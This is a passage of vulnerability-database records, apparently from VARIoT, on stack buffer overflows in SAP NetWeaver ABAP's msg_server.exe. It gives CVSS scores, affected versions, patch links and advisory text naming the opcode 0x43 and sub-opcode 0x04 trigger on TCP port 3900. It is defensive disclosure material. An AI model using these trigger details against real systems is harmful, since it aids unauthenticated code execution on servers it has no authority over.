      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      }
    ],
    "trust": 1.87111164
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 1.6
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      }
    ]
  },
  "last_update_date": "2024-07-23T22:37:43.471000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "SAP has issued an update to correct this vulnerability.",
        "trust": 1.4,
        "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
      },
      {
        "title": "top page",
        "trust": 0.8,
        "url": "https://www.sap.com/japan/index.html"
      },
      {
        "title": "SAP has issued an update to correct this vulnerability.",
        "trust": 0.7,
        "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
      },
      {
        "title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 parameter name patch for remote code execution vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/18435"
      },
      {
        "title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 patch for buffer overflow vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/18434"
      },
      {
        "title": "SAP NetWeaver \u2018msg_server.exe\u2019 Remediation measures for remote denial of service vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=108971"
      },
      {
        "title": "martingalloar",
        "trust": 0.1,
        "url": "https://github.com/martingalloar/martingalloar "
      },
      {
        "title": "publications",
        "trust": 0.1,
        "url": "https://github.com/martingalloar/publications "
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1593"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007128"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201302-368"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-129",
        "trust": 1.0
      },
      {
        "problemtype": "Improper validation of array index (CWE-129) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007128"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1593"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "https://www.coresecurity.com/content/sap-netweaver-msg-srv-multiple-vulnerabilities"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/57956"
      },
      {
        "trust": 1.7,
        "url": "https://packetstormsecurity.com/files/cve/cve-2013-1593"
      },
      {
        "trust": 1.7,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82065"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1028148"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1593"
      },
      {
        "trust": 1.4,
        "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
      },
      {
        "trust": 0.7,
        "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
      },
      {
        "trust": 0.6,
        "url": "http://seclists.org/bugtraq/2012/jun/186"
      },
      {
        "trust": 0.6,
        "url": "http://seclists.org/bugtraq/2012/jun/185"
      },
      {
        "trust": 0.3,
        "url": "http://www.sap.com/platform/netweaver/index.epx"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/129.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://packetstormsecurity.com/files/120350/sap-netweaver-message-server-buffer-overflow.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/martingalloar/martingalloar"
      },
      {
        "trust": 0.1,
        "url": "http://corelabs.coresecurity.com."
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
      },
      {
        "trust": 0.1,
        "url": "https://service.sap.com/sap/support/notes/1800603."
      },
      {
        "trust": 0.1,
        "url": "http://corelabs.coresecurity.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com/advisories/zdi-12-104/."
      },
      {
        "trust": 0.1,
        "url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm."
      },
      {
        "trust": 0.1,
        "url": "http://www.sap.com/platform/netweaver/index.epx."
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1592"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
      },
      {
        "trust": 0.1,
        "url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm."
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com/advisories/zdi-12-112/."
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com/advisories/zdi-12-111/."
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
      },
      {
        "trust": 0.1,
        "url": "http://twitter.com/thezdi"
      },
      {
        "trust": 0.1,
        "url": "http://www.tippingpoint.com"
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com"
      },
      {
        "trust": 0.1,
        "url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1"
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com/advisories/zdi-12-104"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1593"
      },
      {
        "db": "BID",
        "id": "57956"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007128"
      },
      {
        "db": "PACKETSTORM",
        "id": "120350"
      },
      {
        "db": "PACKETSTORM",
        "id": "114279"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201302-368"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1593"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1593"
      },
      {
        "db": "BID",
        "id": "57956"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007128"
      },
      {
        "db": "PACKETSTORM",
        "id": "120350"
      },
      {
        "db": "PACKETSTORM",
        "id": "114279"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201302-368"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1593"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2012-07-02T00:00:00",
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2012-06-28T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "date": "2012-06-28T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "date": "2012-06-27T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "date": "2020-01-23T00:00:00",
        "db": "VULMON",
        "id": "CVE-2013-1593"
      },
      {
        "date": "2013-02-13T00:00:00",
        "db": "BID",
        "id": "57956"
      },
      {
        "date": "2020-02-14T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007128"
      },
      {
        "date": "2013-02-15T23:44:44",
        "db": "PACKETSTORM",
        "id": "120350"
      },
      {
        "date": "2012-06-28T03:51:55",
        "db": "PACKETSTORM",
        "id": "114279"
      },
      {
        "date": "2013-02-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201302-368"
      },
      {
        "date": "2020-01-23T20:15:11.730000",
        "db": "NVD",
        "id": "CVE-2013-1593"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2012-06-28T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "date": "2012-06-28T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "date": "2012-06-27T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "date": "2020-01-31T00:00:00",
        "db": "VULMON",
        "id": "CVE-2013-1593"
      },
      {
        "date": "2013-06-12T18:46:00",
        "db": "BID",
        "id": "57956"
      },
      {
        "date": "2020-02-14T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007128"
      },
      {
        "date": "2020-05-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201302-368"
      },
      {
        "date": "2020-01-31T16:42:13.070000",
        "db": "NVD",
        "id": "CVE-2013-1593"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "120350"
      },
      {
        "db": "PACKETSTORM",
        "id": "114279"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201302-368"
      }
    ],
    "trust": 0.8
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 Parameter name remote code execution vulnerability",
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201302-368"
      }
    ],
    "trust": 0.6
  }
}

VAR-201208-0222

Vulnerability from variot - Updated: 2024-07-23 22:37

Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TCP port 3900. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user-supplied size field to copy a string into a static-sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. NetWeaver ABAP is prone to a denial-of-service vulnerability.

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201208-0222",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "netweaver",
        "scope": null,
        "trust": 2.1,
        "vendor": "sap",
        "version": null
      },
      {
        "model": "netweaver abap",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "sap",
        "version": "7.02"
      },
      {
        "model": "netweaver abap",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "sap",
        "version": "7.0"
      },
      {
        "model": "netweaver abap",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "sap",
        "version": "7.03"
      },
      {
        "model": "netweaver abap",
        "scope": null,
        "trust": 1.2,
        "vendor": "sap",
        "version": null
      },
      {
        "model": "netweaver abap",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sap",
        "version": "7.x"
      },
      {
        "model": "netweaver abap null",
        "scope": "eq",
        "trust": 0.4,
        "vendor": "sap",
        "version": "*"
      },
      {
        "model": "netweaver abap sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sap",
        "version": "7.03"
      },
      {
        "model": "netweaver abap sp6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sap",
        "version": "7.02"
      },
      {
        "model": "netweaver abap sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sap",
        "version": "7.0"
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "BID",
        "id": "78143"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-003710"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201208-264"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-4341"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_abap:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_abap:7.02:sp6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_abap:7.03:sp4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2012-4341"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "e6af8de8b1d4b2b6d5ba2610cbf9cd38",
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-539"
      }
    ],
    "trust": 2.7
  },
  "cve": "CVE-2012-4341",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2012-4341",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "ZDI",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "ZDI-12-112",
            "impactScore": 8.5,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.7,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "ZDI",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "ZDI-12-111",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.7,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "ZDI",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "ZDI-12-104",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.7,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": null,
            "accessVector": null,
            "authentication": null,
            "author": "IVD",
            "availabilityImpact": null,
            "baseScore": null,
            "confidentialityImpact": null,
            "exploitabilityScore": null,
            "id": "29348194-1f62-11e6-abef-000c29c66e3d",
            "impactScore": null,
            "integrityImpact": null,
            "severity": null,
            "trust": 0.2,
            "vectorString": null,
            "version": "unknown"
          },
          {
            "accessComplexity": null,
            "accessVector": null,
            "authentication": null,
            "author": "IVD",
            "availabilityImpact": null,
            "baseScore": null,
            "confidentialityImpact": null,
            "exploitabilityScore": null,
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
            "impactScore": null,
            "integrityImpact": null,
            "severity": null,
            "trust": 0.2,
            "vectorString": null,
            "version": "unknown"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2012-4341",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "ZDI",
            "id": "ZDI-12-112",
            "trust": 0.7,
            "value": "HIGH"
          },
          {
            "author": "ZDI",
            "id": "ZDI-12-111",
            "trust": 0.7,
            "value": "HIGH"
          },
          {
            "author": "ZDI",
            "id": "ZDI-12-104",
            "trust": 0.7,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201208-264",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "HIGH"
          },
          {
            "author": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2012-4341",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-4341"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-003710"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201208-264"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-4341"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TCP port 3900. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user supplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. NetWeaver ABAP is prone to a denial-of-service vulnerability",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2012-4341"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-003710"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "BID",
        "id": "78143"
      },
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-4341"
      }
    ],
    "trust": 5.31
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2012-4341",
        "trust": 2.8
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112",
        "trust": 2.7
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111",
        "trust": 2.7
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104",
        "trust": 2.7
      },
      {
        "db": "SECTRACK",
        "id": "1027211",
        "trust": 2.0
      },
      {
        "db": "SECUNIA",
        "id": "49744",
        "trust": 1.7
      },
      {
        "db": "BID",
        "id": "54229",
        "trust": 1.2
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-003710",
        "trust": 0.8
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-1396",
        "trust": 0.7
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-1394",
